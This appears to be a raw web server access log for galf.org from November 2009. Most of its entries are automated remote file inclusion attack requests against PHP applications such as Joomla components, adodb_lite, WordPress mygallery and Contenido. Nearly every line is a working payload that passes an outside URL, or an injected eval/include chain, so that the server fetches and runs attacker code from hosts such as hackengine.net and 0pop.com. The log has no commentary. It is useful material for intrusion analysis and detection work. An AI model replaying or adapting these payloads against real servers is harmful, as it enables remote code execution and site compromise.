209.172.33.230 - - [08/Nov/2009:18:03:25 -0800] "GET /logs/access_090309.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.12.74 - - [08/Nov/2009:18:06:39 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.12.74 - - [08/Nov/2009:18:06:39 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.12.74 - - [08/Nov/2009:18:06:39 -0800] "GET /logs/access_090323.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.12.74 - - [08/Nov/2009:18:06:39 -0800] "GET /logs/access_090309.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:18:09:17 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:18:09:17 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:09:41 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
85.25.94.14 - - [08/Nov/2009:18:09:41 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
85.25.94.14 - - [08/Nov/2009:18:09:41 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
85.25.94.14 - - [08/Nov/2009:18:10:07 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:10:07 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:10:08 -0800] "GET /logs/access_090914.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:18:10:11 -0800] "GET /logs/access_090713.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:18:10:25 -0800] "GET /logs//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [08/Nov/2009:18:11:11 -0800] "GET /setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [08/Nov/2009:18:11:12 -0800] "GET /logs//setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [08/Nov/2009:18:11:14 -0800] "GET /logs/access_091012.log%20%20//setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:18:11:18 -0800] "GET /?path%5Bdocroot%5D=http://www.hackengine.net/scan/id1? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:18:11:18 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.hackengine.net/scan/id1? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:18:11:18 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.176 - - [08/Nov/2009:18:11:27 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.115.176 - - [08/Nov/2009:18:11:28 -0800] "GET /logs/?D=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:18:11:38 -0800] "GET /logs/access_090525.log%20%20//?path%5Bdocroot%5D=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:18:12:43 -0800] "GET /logs/access_090831.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:18:12:45 -0800] "GET /logs/access_090504.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [08/Nov/2009:18:12:52 -0800] "GET /logs/access_090525.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://come.kr/bbs/data2/temp/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [08/Nov/2009:18:12:52 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://come.kr/bbs/data2/temp/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [08/Nov/2009:18:12:52 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://come.kr/bbs/data2/temp/id1(feelcomz).txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:18:13:08 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.furlanparty.it/flp3/include/logs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:18:13:08 -0800] "GET /logs/access_090323.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.furlanparty.it/flp3/include/logs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:18:13:08 -0800] "GET /logs/access_090309.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.furlanparty.it/flp3/include/logs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:18:13:08 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.furlanparty.it/flp3/include/logs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [08/Nov/2009:18:13:11 -0800] "GET /logs/access_090504.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://come.kr/bbs/data2/temp/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:18:13:40 -0800] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.229.7 - - [08/Nov/2009:18:13:40 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.229.7 - - [08/Nov/2009:18:13:40 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.25.94.14 - - [08/Nov/2009:18:14:30 -0800] "GET /logs/access.log%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
85.25.94.14 - - [08/Nov/2009:18:15:44 -0800] "GET /logs/access_091012.log//components/errors.php?error=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:15:44 -0800] "GET /logs//components/errors.php?error=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:15:44 -0800] "GET /components/errors.php?error=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
209.200.237.152 - - [08/Nov/2009:18:15:46 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.200.237.152 - - [08/Nov/2009:18:15:46 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.200.237.152 - - [08/Nov/2009:18:15:47 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:18:17:40 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:18:17:40 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:18:17:40 -0800] "GET /logs/access_090713.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:18:19:29 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [08/Nov/2009:18:19:30 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [08/Nov/2009:18:19:30 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [08/Nov/2009:18:19:37 -0800] "GET /?path%5Bdocroot%5D=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
63.163.109.246 - - [08/Nov/2009:18:19:41 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
63.163.109.246 - - [08/Nov/2009:18:19:41 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
63.163.109.246 - - [08/Nov/2009:18:19:41 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:18:19:58 -0800] "GET /logs/access_090413.log%20%20//?path%5Bdocroot%5D=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
63.163.109.246 - - [08/Nov/2009:18:20:27 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:18:20:43 -0800] "GET /logs/access_090316.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:21:11 -0800] "GET /logs/access_090921.log//components/errors.php?error=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
124.0.54.130 - - [08/Nov/2009:18:21:24 -0800] "GET /logs/access.log//setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.25.94.14 - - [08/Nov/2009:18:21:25 -0800] "GET /logs/access_090914.log//components/errors.php?error=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
65.55.106.139 - - [08/Nov/2009:18:22:58 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
124.0.54.130 - - [08/Nov/2009:18:25:08 -0800] "GET /logs/access_091012.log//setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:25:25 -0800] "GET /logs/access_090406.log//errors.php?error=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:25:25 -0800] "GET /errors.php?error=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:25:25 -0800] "GET /logs//errors.php?error=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:18:25:25 -0800] "GET /logs/access.log//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:26:08 -0800] "GET /logs/access_090914.log//errors.php?error=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
195.210.57.83 - - [08/Nov/2009:18:26:11 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.galf.org"
195.210.57.83 - - [08/Nov/2009:18:26:11 -0800] "GET /logs/access_090413.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:18:26:16 -0800] "GET /logs/access_090713.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.210.57.83 - - [08/Nov/2009:18:26:34 -0800] "GET /logs/access_090420.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.galf.org"
195.219.57.220 - - [08/Nov/2009:18:26:42 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cextor.fileave.com/setsot/safe.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
81.176.229.7 - - [08/Nov/2009:18:28:24 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
116.127.121.116 - - [08/Nov/2009:18:28:28 -0800] "GET /logs/errors.php?error=http://www.kfd-koeln.de//newsletter/images/test.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
89.203.208.203 - - [08/Nov/2009:18:30:01 -0800] "GET /logs/access_090921.log/http://www.hotel-geneva.ru///images/v.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:18:30:27 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:18:31:05 -0800] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:18:31:19 -0800] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.219.57.220 - - [08/Nov/2009:18:31:49 -0800] "GET /logs/access_091012.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cextor.fileave.com/setsot/safe.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
195.219.57.220 - - [08/Nov/2009:18:31:49 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cextor.fileave.com/setsot/safe.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
195.219.57.220 - - [08/Nov/2009:18:32:05 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cextor.fileave.com/setsot/safe.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [08/Nov/2009:18:32:14 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:18:32:49 -0800] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:18:33:00 -0800] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [08/Nov/2009:18:33:14 -0800] "GET /logs/access_091012.log%20%20/?DOCUMENT_ROOT=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [08/Nov/2009:18:33:14 -0800] "GET /?DOCUMENT_ROOT=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [08/Nov/2009:18:33:14 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.74 - - [08/Nov/2009:18:33:18 -0800] "GET /logs/access_091012.log%20%20/?DOCUMENT_ROOT=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.12.74 - - [08/Nov/2009:18:33:18 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.74 - - [08/Nov/2009:18:33:18 -0800] "GET /?DOCUMENT_ROOT=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:18:33:24 -0800] "GET /logs/access_090921.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:18:34:03 -0800] "GET /logs/access_090601.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:18:34:33 -0800] "GET /logs/access_091012.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:18:35:05 -0800] "GET /logs/access_090629.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [08/Nov/2009:18:35:17 -0800] "GET /logs/errors.php?error=http://www.kfd-koeln.de//newsletter/images/test.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
116.127.121.116 - - [08/Nov/2009:18:35:17 -0800] "GET /errors.php?error=http://www.kfd-koeln.de//newsletter/images/test.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
89.203.208.203 - - [08/Nov/2009:18:36:17 -0800] "GET /http://www.hotel-geneva.ru///images/v.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:18:40:53 -0800] "GET /logs/access_091012.log%20%20/?DOCUMENT_ROOT=http://www.furlanparty.it/flp3/include/logs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:18:40:53 -0800] "GET /?DOCUMENT_ROOT=http://www.furlanparty.it/flp3/include/logs/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:18:40:53 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.furlanparty.it/flp3/include/logs/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
209.200.237.152 - - [08/Nov/2009:18:44:49 -0800] "GET /phphtml.php?htmlclass_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.200.237.152 - - [08/Nov/2009:18:44:49 -0800] "GET /logs/phphtml.php?htmlclass_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.200.237.152 - - [08/Nov/2009:18:45:20 -0800] "GET /logs/access_090629.log%20%20/phphtml.php?htmlclass_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [08/Nov/2009:18:48:27 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [08/Nov/2009:18:48:27 -0800] "GET /logs/access_090406.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [08/Nov/2009:18:48:30 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [08/Nov/2009:18:51:28 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [08/Nov/2009:18:51:28 -0800] "GET /logs/access_090406.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [08/Nov/2009:18:51:28 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [08/Nov/2009:18:52:56 -0800] "GET /errors.php?error=http://www.kfd-koeln.de//newsletter/images/test.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
116.127.121.116 - - [08/Nov/2009:18:52:56 -0800] "GET /logs/errors.php?error=http://www.kfd-koeln.de//newsletter/images/test.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
209.200.237.152 - - [08/Nov/2009:18:53:40 -0800] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [08/Nov/2009:18:53:48 -0800] "GET /logs/access_090525.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [08/Nov/2009:18:53:51 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
